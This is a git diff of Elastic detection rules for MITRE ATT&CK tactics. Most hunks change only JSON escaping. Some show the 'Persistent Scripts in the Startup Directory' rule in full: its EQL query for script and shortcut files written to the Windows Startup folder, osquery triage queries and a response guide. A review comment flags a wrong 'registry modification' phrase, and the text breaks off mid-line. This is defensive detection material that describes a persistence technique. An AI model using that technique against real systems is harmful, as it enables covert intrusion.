- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0005",
 "name": "Defense Evasion",
diff --git a/packages/security_detection_engine/kibana/security_rule/f683dcdf-a018-4801-b066-193d4ae6c8e5_103.json b/packages/security_detection_engine/kibana/security_rule/f683dcdf-a018-4801-b066-193d4ae6c8e5_103.json
index baf74cc9653..bdc69445b83 100644
--- a/packages/security_detection_engine/kibana/security_rule/f683dcdf-a018-4801-b066-193d4ae6c8e5_103.json
+++ b/packages/security_detection_engine/kibana/security_rule/f683dcdf-a018-4801-b066-193d4ae6c8e5_103.json
@@ -63,7 +63,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0005",
 "name": "Defense Evasion",
diff --git a/packages/security_detection_engine/kibana/security_rule/f683dcdf-a018-4801-b066-193d4ae6c8e5_104.json b/packages/security_detection_engine/kibana/security_rule/f683dcdf-a018-4801-b066-193d4ae6c8e5_104.json
index 43cf455fe8e..a49eef0bfca 100644
--- a/packages/security_detection_engine/kibana/security_rule/f683dcdf-a018-4801-b066-193d4ae6c8e5_104.json
+++ b/packages/security_detection_engine/kibana/security_rule/f683dcdf-a018-4801-b066-193d4ae6c8e5_104.json
@@ -64,7 +64,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0005",
 "name": "Defense Evasion",
diff --git a/packages/security_detection_engine/kibana/security_rule/f683dcdf-a018-4801-b066-193d4ae6c8e5_105.json b/packages/security_detection_engine/kibana/security_rule/f683dcdf-a018-4801-b066-193d4ae6c8e5_105.json
index 628fd381f16..0d9c12807d2 100644
--- a/packages/security_detection_engine/kibana/security_rule/f683dcdf-a018-4801-b066-193d4ae6c8e5_105.json
+++ b/packages/security_detection_engine/kibana/security_rule/f683dcdf-a018-4801-b066-193d4ae6c8e5_105.json
@@ -64,7 +64,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0005",
 "name": "Defense Evasion",
diff --git a/packages/security_detection_engine/kibana/security_rule/f75f65cf-ed04-48df-a7ff-b02a8bfe636e_1.json b/packages/security_detection_engine/kibana/security_rule/f75f65cf-ed04-48df-a7ff-b02a8bfe636e_1.json
index 1c769a5aa56..ef35625b20c 100644
--- a/packages/security_detection_engine/kibana/security_rule/f75f65cf-ed04-48df-a7ff-b02a8bfe636e_1.json
+++ b/packages/security_detection_engine/kibana/security_rule/f75f65cf-ed04-48df-a7ff-b02a8bfe636e_1.json
@@ -55,7 +55,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0007",
 "name": "Discovery",
diff --git a/packages/security_detection_engine/kibana/security_rule/f75f65cf-ed04-48df-a7ff-b02a8bfe636e_2.json b/packages/security_detection_engine/kibana/security_rule/f75f65cf-ed04-48df-a7ff-b02a8bfe636e_2.json
index c2bfee2da44..86d69bb8ee4 100644
--- a/packages/security_detection_engine/kibana/security_rule/f75f65cf-ed04-48df-a7ff-b02a8bfe636e_2.json
+++ b/packages/security_detection_engine/kibana/security_rule/f75f65cf-ed04-48df-a7ff-b02a8bfe636e_2.json
@@ -56,7 +56,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0007",
 "name": "Discovery",
diff --git a/packages/security_detection_engine/kibana/security_rule/f766ffaf-9568-4909-b734-75d19b35cbf4_101.json b/packages/security_detection_engine/kibana/security_rule/f766ffaf-9568-4909-b734-75d19b35cbf4_101.json
index 0a62b209682..d1a267667b2 100644
--- a/packages/security_detection_engine/kibana/security_rule/f766ffaf-9568-4909-b734-75d19b35cbf4_101.json
+++ b/packages/security_detection_engine/kibana/security_rule/f766ffaf-9568-4909-b734-75d19b35cbf4_101.json
@@ -59,7 +59,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0040",
 "name": "Impact",
diff --git a/packages/security_detection_engine/kibana/security_rule/f766ffaf-9568-4909-b734-75d19b35cbf4_102.json b/packages/security_detection_engine/kibana/security_rule/f766ffaf-9568-4909-b734-75d19b35cbf4_102.json
index c69ce6c84a7..cd457bde000 100644
--- a/packages/security_detection_engine/kibana/security_rule/f766ffaf-9568-4909-b734-75d19b35cbf4_102.json
+++ b/packages/security_detection_engine/kibana/security_rule/f766ffaf-9568-4909-b734-75d19b35cbf4_102.json
@@ -57,7 +57,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0040",
 "name": "Impact",
diff --git a/packages/security_detection_engine/kibana/security_rule/f772ec8a-e182-483c-91d2-72058f76a44c_105.json b/packages/security_detection_engine/kibana/security_rule/f772ec8a-e182-483c-91d2-72058f76a44c_105.json
index 69ca3dd3f21..2b8e98f2b6a 100644
--- a/packages/security_detection_engine/kibana/security_rule/f772ec8a-e182-483c-91d2-72058f76a44c_105.json
+++ b/packages/security_detection_engine/kibana/security_rule/f772ec8a-e182-483c-91d2-72058f76a44c_105.json
@@ -67,7 +67,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0005",
 "name": "Defense Evasion",
diff --git a/packages/security_detection_engine/kibana/security_rule/f772ec8a-e182-483c-91d2-72058f76a44c_106.json b/packages/security_detection_engine/kibana/security_rule/f772ec8a-e182-483c-91d2-72058f76a44c_106.json
index e9f1dbd27d9..5345d91fcd5 100644
--- a/packages/security_detection_engine/kibana/security_rule/f772ec8a-e182-483c-91d2-72058f76a44c_106.json
+++ b/packages/security_detection_engine/kibana/security_rule/f772ec8a-e182-483c-91d2-72058f76a44c_106.json
@@ -64,7 +64,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0005",
 "name": "Defense Evasion",
diff --git a/packages/security_detection_engine/kibana/security_rule/f772ec8a-e182-483c-91d2-72058f76a44c_107.json b/packages/security_detection_engine/kibana/security_rule/f772ec8a-e182-483c-91d2-72058f76a44c_107.json
index 288eb62eb84..3be04e1aade 100644
--- a/packages/security_detection_engine/kibana/security_rule/f772ec8a-e182-483c-91d2-72058f76a44c_107.json
+++ b/packages/security_detection_engine/kibana/security_rule/f772ec8a-e182-483c-91d2-72058f76a44c_107.json
@@ -64,7 +64,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0005",
 "name": "Defense Evasion",
diff --git a/packages/security_detection_engine/kibana/security_rule/f772ec8a-e182-483c-91d2-72058f76a44c_208.json b/packages/security_detection_engine/kibana/security_rule/f772ec8a-e182-483c-91d2-72058f76a44c_208.json
index b67ec0b2469..c5130e1fd65 100644
--- a/packages/security_detection_engine/kibana/security_rule/f772ec8a-e182-483c-91d2-72058f76a44c_208.json
+++ b/packages/security_detection_engine/kibana/security_rule/f772ec8a-e182-483c-91d2-72058f76a44c_208.json
@@ -64,7 +64,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0005",
 "name": "Defense Evasion",
diff --git a/packages/security_detection_engine/kibana/security_rule/f7769104-e8f9-4931-94a2-68fc04eadec3_1.json b/packages/security_detection_engine/kibana/security_rule/f7769104-e8f9-4931-94a2-68fc04eadec3_1.json
index 5b62709a6fc..0a861ab6338 100644
--- a/packages/security_detection_engine/kibana/security_rule/f7769104-e8f9-4931-94a2-68fc04eadec3_1.json
+++ b/packages/security_detection_engine/kibana/security_rule/f7769104-e8f9-4931-94a2-68fc04eadec3_1.json
@@ -50,7 +50,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0003",
 "name": "Persistence",
@@ -72,7 +72,7 @@
 ]
 },
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0008",
 "name": "Lateral Movement",
diff --git a/packages/security_detection_engine/kibana/security_rule/f7769104-e8f9-4931-94a2-68fc04eadec3_2.json b/packages/security_detection_engine/kibana/security_rule/f7769104-e8f9-4931-94a2-68fc04eadec3_2.json
index 75adf3bdfc2..37d4d0a3d81 100644
--- a/packages/security_detection_engine/kibana/security_rule/f7769104-e8f9-4931-94a2-68fc04eadec3_2.json
+++ b/packages/security_detection_engine/kibana/security_rule/f7769104-e8f9-4931-94a2-68fc04eadec3_2.json
@@ -49,7 +49,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0003",
 "name": "Persistence",
@@ -71,7 +71,7 @@
 ]
 },
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0008",
 "name": "Lateral Movement",
diff --git a/packages/security_detection_engine/kibana/security_rule/f7c4dc5a-a58d-491d-9f14-9b66507121c0_104.json b/packages/security_detection_engine/kibana/security_rule/f7c4dc5a-a58d-491d-9f14-9b66507121c0_104.json
index 72187c19b45..8b853fe33af 100644
--- a/packages/security_detection_engine/kibana/security_rule/f7c4dc5a-a58d-491d-9f14-9b66507121c0_104.json
+++ b/packages/security_detection_engine/kibana/security_rule/f7c4dc5a-a58d-491d-9f14-9b66507121c0_104.json
@@ -14,7 +14,7 @@ "language": "eql", "license": "Elastic License v2", "name": "Persistent Scripts in the Startup Directory", - "note": "## Triage and analysis\n\n### Investigating Persistent Scripts in the Startup Directory\n\nThe Windows Startup folder is a special folder in Windows. Programs added to this folder are executed during account logon, without user interaction, providing an excellent way for attackers to maintain persistence.\n\nThis rule looks for shortcuts created by wscript.exe or cscript.exe, or js/vbs scripts created by any process.\n\n\u003e **Note**:\n\u003e This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Validate if the activity is not related to planned patches, updates, network administrator activity, or legitimate software installations.\n- Assess whether this behavior is prevalent in the environment by looking for similar occurrences across hosts.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the file using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - 
$osquery_0\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - $osquery_1\n - $osquery_2\n - $osquery_3\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification.\n\n### False positive analysis\n\n- This activity is unlikely to happen legitimately. Benign true positives (B-TPs) can be added as exceptions if necessary.\n\n### Related rules\n\n- Suspicious Startup Shell Folder Modification - c8b150f0-0164-475b-a75e-74b47800a9ff\n- Startup Folder Persistence via Unsigned Process - 2fba96c0-ade5-4bce-b92f-a5df2509da3f\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. 
Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).", + "note": "## Triage and analysis\n\n### Investigating Persistent Scripts in the Startup Directory\n\nThe Windows Startup folder is a special folder in Windows. Programs added to this folder are executed during account logon, without user interaction, providing an excellent way for attackers to maintain persistence.\n\nThis rule looks for shortcuts created by wscript.exe or cscript.exe, or js/vbs scripts created by any process.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. 
Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Validate if the activity is not related to planned patches, updates, network administrator activity, or legitimate software installations.\n- Assess whether this behavior is prevalent in the environment by looking for similar occurrences across hosts.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the file using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - $osquery_0\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - $osquery_1\n - $osquery_2\n - $osquery_3\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification.\n\n### False positive analysis\n\n- This activity is unlikely to happen legitimately. 
Benign true positives (B-TPs) can be added as exceptions if necessary.\n\n### Related rules\n\n- Suspicious Startup Shell Folder Modification - c8b150f0-0164-475b-a75e-74b47800a9ff\n- Startup Folder Persistence via Unsigned Process - 2fba96c0-ade5-4bce-b92f-a5df2509da3f\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Run a full antimalware scan. 
This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).", "query": "file where host.os.type == \"windows\" and event.type != \"deletion\" and user.domain != \"NT AUTHORITY\" and\n\n /* detect shortcuts created by wscript.exe or cscript.exe */\n (file.path : \"C:\\\\*\\\\Programs\\\\Startup\\\\*.lnk\" and\n process.name : (\"wscript.exe\", \"cscript.exe\")) or\n\n /* detect vbs or js files created by any process */\n file.path : (\"C:\\\\*\\\\Programs\\\\Startup\\\\*.vbs\",\n \"C:\\\\*\\\\Programs\\\\Startup\\\\*.vbe\",\n \"C:\\\\*\\\\Programs\\\\Startup\\\\*.wsh\",\n \"C:\\\\*\\\\Programs\\\\Startup\\\\*.wsf\",\n \"C:\\\\*\\\\Programs\\\\Startup\\\\*.js\")\n", "related_integrations": [ { @@ -55,7 +55,7 @@ ], "risk_score": 47, "rule_id": "f7c4dc5a-a58d-491d-9f14-9b66507121c0", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "medium", "tags": [ "Elastic", @@ -68,7 +68,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", 
diff --git a/packages/security_detection_engine/kibana/security_rule/f7c4dc5a-a58d-491d-9f14-9b66507121c0_105.json b/packages/security_detection_engine/kibana/security_rule/f7c4dc5a-a58d-491d-9f14-9b66507121c0_105.json
index 5d2547b8497..7357055f660 100644
--- a/packages/security_detection_engine/kibana/security_rule/f7c4dc5a-a58d-491d-9f14-9b66507121c0_105.json
+++ b/packages/security_detection_engine/kibana/security_rule/f7c4dc5a-a58d-491d-9f14-9b66507121c0_105.json
@@ -14,7 +14,7 @@ "language": "eql", "license": "Elastic License v2", "name": "Persistent Scripts in the Startup Directory", - "note": "## Triage and analysis\n\n### Investigating Persistent Scripts in the Startup Directory\n\nThe Windows Startup folder is a special folder in Windows. Programs added to this folder are executed during account logon, without user interaction, providing an excellent way for attackers to maintain persistence.\n\nThis rule looks for shortcuts created by wscript.exe or cscript.exe, or js/vbs scripts created by any process.\n\n\u003e **Note**:\n\u003e This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Validate if the activity is not related to planned patches, updates, network administrator activity, or legitimate software installations.\n- Assess whether this behavior is prevalent in the environment by looking for similar occurrences across hosts.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the file using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - 
!{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification.\n\n### False positive analysis\n\n- This activity is unlikely to happen legitimately. 
Benign true positives (B-TPs) can be added as exceptions if necessary.\n\n### Related rules\n\n- Suspicious Startup Shell Folder Modification - c8b150f0-0164-475b-a75e-74b47800a9ff\n- Startup Folder Persistence via Unsigned Process - 2fba96c0-ade5-4bce-b92f-a5df2509da3f\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).", + "note": "## Triage and analysis\n\n### Investigating Persistent Scripts in the Startup Directory\n\nThe Windows Startup folder is a special folder in Windows. 
Programs added to this folder are executed during account logon, without user interaction, providing an excellent way for attackers to maintain persistence.\n\nThis rule looks for shortcuts created by wscript.exe or cscript.exe, or js/vbs scripts created by any process.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Validate if the activity is not related to planned patches, updates, network administrator activity, or legitimate software installations.\n- Assess whether this behavior is prevalent in the environment by looking for similar occurrences across hosts.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the file using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous 
entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification.\n\n### False positive analysis\n\n- This activity is unlikely to happen legitimately. 
Benign true positives (B-TPs) can be added as exceptions if necessary.\n\n### Related rules\n\n- Suspicious Startup Shell Folder Modification - c8b150f0-0164-475b-a75e-74b47800a9ff\n- Startup Folder Persistence via Unsigned Process - 2fba96c0-ade5-4bce-b92f-a5df2509da3f\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Run a full antimalware scan. 
This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).", "query": "file where host.os.type == \"windows\" and event.type != \"deletion\" and user.domain != \"NT AUTHORITY\" and\n\n /* detect shortcuts created by wscript.exe or cscript.exe */\n (file.path : \"C:\\\\*\\\\Programs\\\\Startup\\\\*.lnk\" and\n process.name : (\"wscript.exe\", \"cscript.exe\")) or\n\n /* detect vbs or js files created by any process */\n file.path : (\"C:\\\\*\\\\Programs\\\\Startup\\\\*.vbs\",\n \"C:\\\\*\\\\Programs\\\\Startup\\\\*.vbe\",\n \"C:\\\\*\\\\Programs\\\\Startup\\\\*.wsh\",\n \"C:\\\\*\\\\Programs\\\\Startup\\\\*.wsf\",\n \"C:\\\\*\\\\Programs\\\\Startup\\\\*.js\")\n", "related_integrations": [ { @@ -55,7 +55,7 @@ ], "risk_score": 47, "rule_id": "f7c4dc5a-a58d-491d-9f14-9b66507121c0", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "medium", "tags": [ "Elastic", @@ -68,7 +68,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", 
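Review bot: The investigation guide on the new `"note"` line of this hunk ends its account-investigation step with `searching for login events (for example, 4624) to the target host after the registry modification`, but this rule keys on file creation in the Startup folder, not on a registry change, so the phrase looks carried over from another guide and should read `after the file creation` (or simply `after the alert`). The same text appears in the `_106.json` and `_107.json` hunks below. Since these versioned snapshots appear to be exported artifacts, the correction presumably belongs in the upstream rule source so the next exported version carries it, rather than in a hand edit here. Beyond that, the hunks only change JSON escape sequences (`\u003e` to `>`, `\u003c` to `<`, `\u0026` to `&`), which decode to identical strings; a decoded-JSON comparison of old and new files would confirm that no query or note content actually moved.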
diff --git a/packages/security_detection_engine/kibana/security_rule/f7c4dc5a-a58d-491d-9f14-9b66507121c0_106.json b/packages/security_detection_engine/kibana/security_rule/f7c4dc5a-a58d-491d-9f14-9b66507121c0_106.json
index 3193d0df995..cd7fb6a12b9 100644
--- a/packages/security_detection_engine/kibana/security_rule/f7c4dc5a-a58d-491d-9f14-9b66507121c0_106.json
+++ b/packages/security_detection_engine/kibana/security_rule/f7c4dc5a-a58d-491d-9f14-9b66507121c0_106.json
@@ -14,7 +14,7 @@ "language": "eql", "license": "Elastic License v2", "name": "Persistent Scripts in the Startup Directory", - "note": "## Triage and analysis\n\n### Investigating Persistent Scripts in the Startup Directory\n\nThe Windows Startup folder is a special folder in Windows. Programs added to this folder are executed during account logon, without user interaction, providing an excellent way for attackers to maintain persistence.\n\nThis rule looks for shortcuts created by wscript.exe or cscript.exe, or js/vbs scripts created by any process.\n\n\u003e **Note**:\n\u003e This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Validate if the activity is not related to planned patches, updates, network administrator activity, or legitimate software installations.\n- Assess whether this behavior is prevalent in the environment by looking for similar occurrences across hosts.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the file using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - 
